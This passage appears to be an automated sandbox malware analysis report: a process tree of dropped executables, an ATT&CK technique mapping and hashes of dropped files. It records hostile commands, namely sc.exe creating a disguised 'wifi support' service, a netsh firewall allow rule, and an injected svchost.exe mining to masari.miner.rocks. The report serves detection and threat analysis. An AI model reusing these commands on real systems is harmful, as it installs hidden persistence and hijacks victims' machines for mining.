                                                                                              • C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:3644
                                                                                                • C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                  C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:1756
                                                                                              • C:\Users\Admin\AppData\Roaming\fbwidjs
                                                                                                C:\Users\Admin\AppData\Roaming\fbwidjs
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:6088
                                                                                              • C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                2⤵
                                                                                                  PID:3820
                                                                                                  • C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                    C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                    3⤵
                                                                                                      PID:1648
                                                                                                  • C:\Users\Admin\AppData\Roaming\fbwidjs
                                                                                                    C:\Users\Admin\AppData\Roaming\fbwidjs
                                                                                                    2⤵
                                                                                                      PID:5320
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                    1⤵
                                                                                                      PID:348
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5036
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:1584
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                        PID:2284
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        • Modifies registry class
                                                                                                        PID:4864
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:6060
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5460
                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        PID:5560
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:4640
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:2648
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                        1⤵
                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                        PID:5344
                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5576
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\144.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\144.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4252
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jkxbpeaa\
                                                                                                          2⤵
                                                                                                            PID:5600
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nwqvnmhd.exe" C:\Windows\SysWOW64\jkxbpeaa\
                                                                                                            2⤵
                                                                                                              PID:2132
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              "C:\Windows\System32\sc.exe" create jkxbpeaa binPath= "C:\Windows\SysWOW64\jkxbpeaa\nwqvnmhd.exe /d\"C:\Users\Admin\AppData\Local\Temp\144.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                              2⤵
                                                                                                                PID:4200
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                "C:\Windows\System32\sc.exe" description jkxbpeaa "wifi internet conection"
                                                                                                                2⤵
                                                                                                                  PID:4916
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  "C:\Windows\System32\sc.exe" start jkxbpeaa
                                                                                                                  2⤵
                                                                                                                    PID:3420
                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                    2⤵
                                                                                                                      PID:5656
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\26E.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\26E.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4584
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9A3.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\9A3.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2712
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1171344888.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1171344888.exe"
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5188
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\397771211.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\397771211.exe"
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2240
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1339.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1339.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5184
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:5480
                                                                                                                    • C:\Windows\system32\OpenWith.exe
                                                                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:3736
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:4016
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:2308
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:4944
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:4244
                                                                                                                          • C:\Windows\SysWOW64\jkxbpeaa\nwqvnmhd.exe
                                                                                                                            C:\Windows\SysWOW64\jkxbpeaa\nwqvnmhd.exe /d"C:\Users\Admin\AppData\Local\Temp\144.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:1648
                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                              svchost.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:5124
                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                svchost.exe -o masari.miner.rocks:30162 -u 9rqX2BQ6Z4teAkaSqGBWvPZEM7bAtidewXXjYz86pVgKUQqDHeUqjy55fXt2fJAaJkPBteXWhptFqJVSr132QxsSSGfMCgw.50000 -p w=a -k -a cn/half
                                                                                                                                3⤵
                                                                                                                                  PID:1284
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe
                                                                                                                              1⤵
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:5996
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:1432
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:4352
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5488
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                1⤵
                                                                                                                                  PID:5324
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                  1⤵
                                                                                                                                    PID:5660
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:4552
                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    PID:6020
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:4548
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:5672

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                  Persistence

                                                                                                                                  New Service

                                                                                                                                  1
                                                                                                                                  T1050

                                                                                                                                  Modify Existing Service

                                                                                                                                  1
                                                                                                                                  T1031

                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                  2
                                                                                                                                  T1060

                                                                                                                                  BITS Jobs

                                                                                                                                  1
                                                                                                                                  T1197

                                                                                                                                  Privilege Escalation

                                                                                                                                  New Service

                                                                                                                                  1
                                                                                                                                  T1050

                                                                                                                                  Defense Evasion

                                                                                                                                  Disabling Security Tools

                                                                                                                                  1
                                                                                                                                  T1089

                                                                                                                                  Modify Registry

                                                                                                                                  5
                                                                                                                                  T1112

                                                                                                                                  BITS Jobs

                                                                                                                                  1
                                                                                                                                  T1197

                                                                                                                                  Install Root Certificate

                                                                                                                                  1
                                                                                                                                  T1130

                                                                                                                                  Credential Access

                                                                                                                                  Credentials in Files

                                                                                                                                  4
                                                                                                                                  T1081

                                                                                                                                  Discovery

                                                                                                                                  Software Discovery

                                                                                                                                  1
                                                                                                                                  T1518

                                                                                                                                  Query Registry

                                                                                                                                  4
                                                                                                                                  T1012

                                                                                                                                  System Information Discovery

                                                                                                                                  5
                                                                                                                                  T1082

                                                                                                                                  Security Software Discovery

                                                                                                                                  1
                                                                                                                                  T1063

                                                                                                                                  Peripheral Device Discovery

                                                                                                                                  1
                                                                                                                                  T1120

                                                                                                                                  Remote System Discovery

                                                                                                                                  1
                                                                                                                                  T1018

                                                                                                                                  Collection

                                                                                                                                  Data from Local System

                                                                                                                                  4
                                                                                                                                  T1005

                                                                                                                                  Command and Control

                                                                                                                                  Web Service

                                                                                                                                  1
                                                                                                                                  T1102

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                    MD5

                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                    SHA1

                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                    SHA256

                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                    SHA512

                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                    MD5

                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                    SHA1

                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                    SHA256

                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                    SHA512

                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                  • C:\Program Files\Windows NT\YBBTWDHIOQ\ultramediaburner.exe
                                                                                                                                    MD5

                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                    SHA1

                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                    SHA256

                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                    SHA512

                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                  • C:\Program Files\Windows NT\YBBTWDHIOQ\ultramediaburner.exe
                                                                                                                                    MD5

                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                    SHA1

                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                    SHA256

                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                    SHA512

                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                  • C:\Program Files\install.dat
                                                                                                                                    MD5

                                                                                                                                    806c3221a013fec9530762750556c332

                                                                                                                                    SHA1

                                                                                                                                    36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                    SHA256

                                                                                                                                    9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                    SHA512

                                                                                                                                    56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                  • C:\Program Files\install.dat
                                                                                                                                    MD5

                                                                                                                                    31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                    SHA1

                                                                                                                                    c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                    SHA256

                                                                                                                                    b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                    SHA512

                                                                                                                                    3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                                  • C:\Program Files\install.dll
                                                                                                                                    MD5

                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                    SHA1

                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                    SHA256

                                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                    SHA512

                                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                  • C:\Program Files\install.dll
                                                                                                                                    MD5

                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                    SHA1

                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                    SHA256

                                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                    SHA512

                                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                  • C:\Program Files\libEGL.dll
                                                                                                                                    MD5

                                                                                                                                    cc0f81a657d6887e246f49151e60123d

                                                                                                                                    SHA1

                                                                                                                                    1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                                    SHA256

                                                                                                                                    31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                                    SHA512

                                                                                                                                    8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                    MD5

                                                                                                                                    3caa69cfe89abfd90bdce40ad5b137b7

                                                                                                                                    SHA1

                                                                                                                                    ae6fc20857170e4edeca2abb966b17390040a20b

                                                                                                                                    SHA256

                                                                                                                                    c834c22efe48ce7949fb75a0dd3447b6b7cd5fc75e8633b111fc49e34cc454bf

                                                                                                                                    SHA512

                                                                                                                                    548165bba3fdcadb8b1906e0570b3de4e17eb62298d54beda7b406d0e5723e78023c3c998c2152a18b0625869433b416604f4c515d7cedf935ebd2995b946e12

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                    MD5

                                                                                                                                    60f6b2c801a2a958b06c893b74b19282

                                                                                                                                    SHA1

                                                                                                                                    da0e286f2d50cc4f731f3fcec60de23069faf17f

                                                                                                                                    SHA256

                                                                                                                                    593de34d0c7012a797f118d197186c85f0bd1fd4d3a70fa84e3ea89f9f980032

                                                                                                                                    SHA512

                                                                                                                                    406ca703da00617705fbe0c5b9f6be656fffd3f43a8f68e6ccff78e24e5ef8b024f3f2dd1a28d63888abab10aacdab3a78bce0f2656e08b373e4ef8b0717833d

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                    MD5

                                                                                                                                    40f731076413a3d831c8b0e49a455145

                                                                                                                                    SHA1

                                                                                                                                    c026c2ed97fd950d9d8e46d60b2340c4a954630b

                                                                                                                                    SHA256

                                                                                                                                    c8c07f70b5299d0b9e9849a5b7f0e40a1529a5b5b995e3429ad6f5a58684ef2b

                                                                                                                                    SHA512

                                                                                                                                    b834e27352b60283b0b77173642bb468fe8dd6029d99555475269662c6b84acc1865f41497053b6bd095e4625e249f26c6b9b313c66dd0ab4b86f07969a7670f

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                    MD5

                                                                                                                                    cc26da791ea89bfd64db0c705b93e11d

                                                                                                                                    SHA1

                                                                                                                                    2aacb3ab46b9215b2ed5e8983a5742ab5b2c3e27

                                                                                                                                    SHA256

                                                                                                                                    86d68d724dfbe5bee58e11d28789c03a0a2b80765af1d441d0040ad0702add6e

                                                                                                                                    SHA512

                                                                                                                                    e3d7d563e22cf8c81d5bb6a67555fe4c363fe3190811907ea09c849b2ace0c2c117f185368d94073be945b6c4f76500096c3593d23ce463e4c80f6fbd33efa2b

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                    MD5

                                                                                                                                    49e8657f8363f6c9c88ed06da9adfac4

                                                                                                                                    SHA1

                                                                                                                                    4027b4d38e2e3e35637f0533cc459d9d6cc09f4b

                                                                                                                                    SHA256

                                                                                                                                    e838cb6bd0be2b3789db57fa517a4a9721e07acdc8213a3f5616ec6f7bedcdc2

                                                                                                                                    SHA512

                                                                                                                                    511ce019c7bcfd20ca28f2a49b68f735f894c515b52612f879eb109bdaa627a68b44f5732a4a008763631ee300e6033da0438809731d7874ad8b265e60703d03

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1cukne5s.amw\md1_1eaf.exe
                                                                                                                                    MD5

                                                                                                                                    431530f7c96ab811f76f1a1c2723e8a9

                                                                                                                                    SHA1

                                                                                                                                    3dd4ea178f1207e85cf26a47b37bb37cb8c642d2

                                                                                                                                    SHA256

                                                                                                                                    0ca1ecf960572ebac13f8fa2e1da9760b1abb27c9c1ca061d765968cbbae3691

                                                                                                                                    SHA512

                                                                                                                                    01745e3bec0e6876a37afe881dacfa42824289240ea8a8dbe2a798f041d7d5ddd89196369477940f069af3e478fbd59afcc6540bf1c7370d07696a29719fff40

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1cukne5s.amw\md1_1eaf.exe
                                                                                                                                    MD5

                                                                                                                                    431530f7c96ab811f76f1a1c2723e8a9

                                                                                                                                    SHA1

                                                                                                                                    3dd4ea178f1207e85cf26a47b37bb37cb8c642d2

                                                                                                                                    SHA256

                                                                                                                                    0ca1ecf960572ebac13f8fa2e1da9760b1abb27c9c1ca061d765968cbbae3691

                                                                                                                                    SHA512

                                                                                                                                    01745e3bec0e6876a37afe881dacfa42824289240ea8a8dbe2a798f041d7d5ddd89196369477940f069af3e478fbd59afcc6540bf1c7370d07696a29719fff40

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\242edxts.hdy\c7ae36fa.exe
                                                                                                                                    MD5

                                                                                                                                    381bb003983a113f2921a3cd6d5dd661

                                                                                                                                    SHA1

                                                                                                                                    8525826e08e5a6a66852aedc9744c518a8237405

                                                                                                                                    SHA256

                                                                                                                                    a0e7f88b77ab3a4889bff06f570658cf49814af0aec9876d658f35757489cb91

                                                                                                                                    SHA512

                                                                                                                                    d1fe71a82464a4eb14e7dc1df25ebdc5f08b534113d3a60d55003cce0b92ef7bcf508d936ebf811568fa93400c88881003d086aa4734fb6e7de787691be3f537

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2d-f1811-a53-cb3a0-938224ffe543d\Dilalisyzhe.exe
                                                                                                                                    MD5

                                                                                                                                    c1671cfbdbd5de53b60feb041f290a7d

                                                                                                                                    SHA1

                                                                                                                                    7d8c20bf34a7d970f98a2d339d022e2e143b5c58

                                                                                                                                    SHA256

                                                                                                                                    53637bf7daa6b5edf35a77767d903da429e0b9a3a6705194f137925f44c1522a

                                                                                                                                    SHA512

                                                                                                                                    751b869a9903939b6a3dd208b428656d694969fcf475bb0a28e1b9b2e7f22c0575b6b9b1b6ee5e661589812004d48c81e02fdaf8981440a59c1995cd0f3acceb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2d-f1811-a53-cb3a0-938224ffe543d\Dilalisyzhe.exe
                                                                                                                                    MD5

                                                                                                                                    c1671cfbdbd5de53b60feb041f290a7d

                                                                                                                                    SHA1

                                                                                                                                    7d8c20bf34a7d970f98a2d339d022e2e143b5c58

                                                                                                                                    SHA256

                                                                                                                                    53637bf7daa6b5edf35a77767d903da429e0b9a3a6705194f137925f44c1522a

                                                                                                                                    SHA512

                                                                                                                                    751b869a9903939b6a3dd208b428656d694969fcf475bb0a28e1b9b2e7f22c0575b6b9b1b6ee5e661589812004d48c81e02fdaf8981440a59c1995cd0f3acceb

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2d-f1811-a53-cb3a0-938224ffe543d\Dilalisyzhe.exe.config
                                                                                                                                    MD5

                                                                                                                                    98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                    SHA1

                                                                                                                                    f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                    SHA256

                                                                                                                                    8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                    SHA512

                                                                                                                                    95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2d-f1811-a53-cb3a0-938224ffe543d\Kenessey.txt
                                                                                                                                    MD5

                                                                                                                                    97384261b8bbf966df16e5ad509922db

                                                                                                                                    SHA1

                                                                                                                                    2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                                    SHA256

                                                                                                                                    9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                                    SHA512

                                                                                                                                    b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2e-cf490-9e2-63a83-f6567b8a6741d\Kegezholecu.exe
                                                                                                                                    MD5

                                                                                                                                    b13abfab75b4ac0c6d13856bf66cdced

                                                                                                                                    SHA1

